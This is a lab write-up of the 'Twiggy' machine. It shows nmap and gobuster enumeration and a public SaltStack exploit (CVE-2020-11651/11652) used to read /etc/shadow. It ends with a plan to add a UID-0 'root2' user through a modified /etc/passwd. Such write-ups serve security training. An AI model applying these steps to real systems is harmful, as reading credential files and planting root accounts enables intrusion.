Twiggy

Nmap Scan

$ nmap -sC -sV -Pn -oN nmap 192.168.160.62          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 12:39 +08
Nmap scan report for 192.168.160.62
Host is up (0.0076s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
|   256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_  256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
|_http-title: Home | Mezzanine
|_http-server-header: nginx/1.16.1
8000/tcp open  http    nginx 1.16.1
|_http-title: Site doesn't have a title (application/json).
|_http-server-header: nginx/1.16.1
|_http-open-proxy: Proxy might be redirecting requests

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds

Initial Access

Port 8000

On port 8000, there is a HTTP server running. This is what is shown on the website.

Directory Enumeration

$ gobuster dir -u http://192.168.160.62:8000 -w /usr/share/wordlists/dirb/big.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.160.62:8000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/användare            (Status: 500) [Size: 1455]
/events               (Status: 401) [Size: 753]
/hook                 (Status: 401) [Size: 753]
/index                (Status: 200) [Size: 146]
/jobs                 (Status: 401) [Size: 753]
/keys                 (Status: 401) [Size: 753]
/login                (Status: 200) [Size: 43]
/logout               (Status: 500) [Size: 823]
/run                  (Status: 200) [Size: 146]
/secci�               (Status: 500) [Size: 1455]
/stats                (Status: 401) [Size: 753]
/token                (Status: 200) [Size: 146]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

If I try to access the /events, I am greeted with this error message.

However after searching online, there is not much information regard this software that is running.

Port 80

There is this website running on port 80.

Further enumeration shows that there is a login page to an admin site.

However, we are unable to access using the login page.

Directory Enumeration

$ gobuster dir -u http://192.168.160.62 -w /usr/share/wordlists/dirb/big.txt -k -b 301
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.160.62
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   301
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 404) [Size: 6165]
/favicon.ico          (Status: 404) [Size: 153]
/sitemap.xml          (Status: 200) [Size: 530]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

After going into sitemap.xml, there is no URLs that looks interesting to look at.

After checking all of this, there might be something that I am missing. So, I went to rescan but this time with all ports. The scan reveal 2 ports that is used for ZeroMQ ZMTP 2.0

CVE-2020-11651 and CVE-2020-11652

After google searching online, there is a vulnerability for it.

Saltstack 3000.1 - Remote Code ExecutionExploit Database

I tested if the exploit will work and sure enough, it is able to read the files from the server.

However, after many attempts, we not able to run our own reverse shell payload.

However, if we try to read the /etc/shadow, we are able to read the file. This means that we are running as root.

Upload new /etc/passwd file

We will create the passwdfile based on the information from the passwd file from the target machine. We will then add another user root2 who is able to run as UID of 0.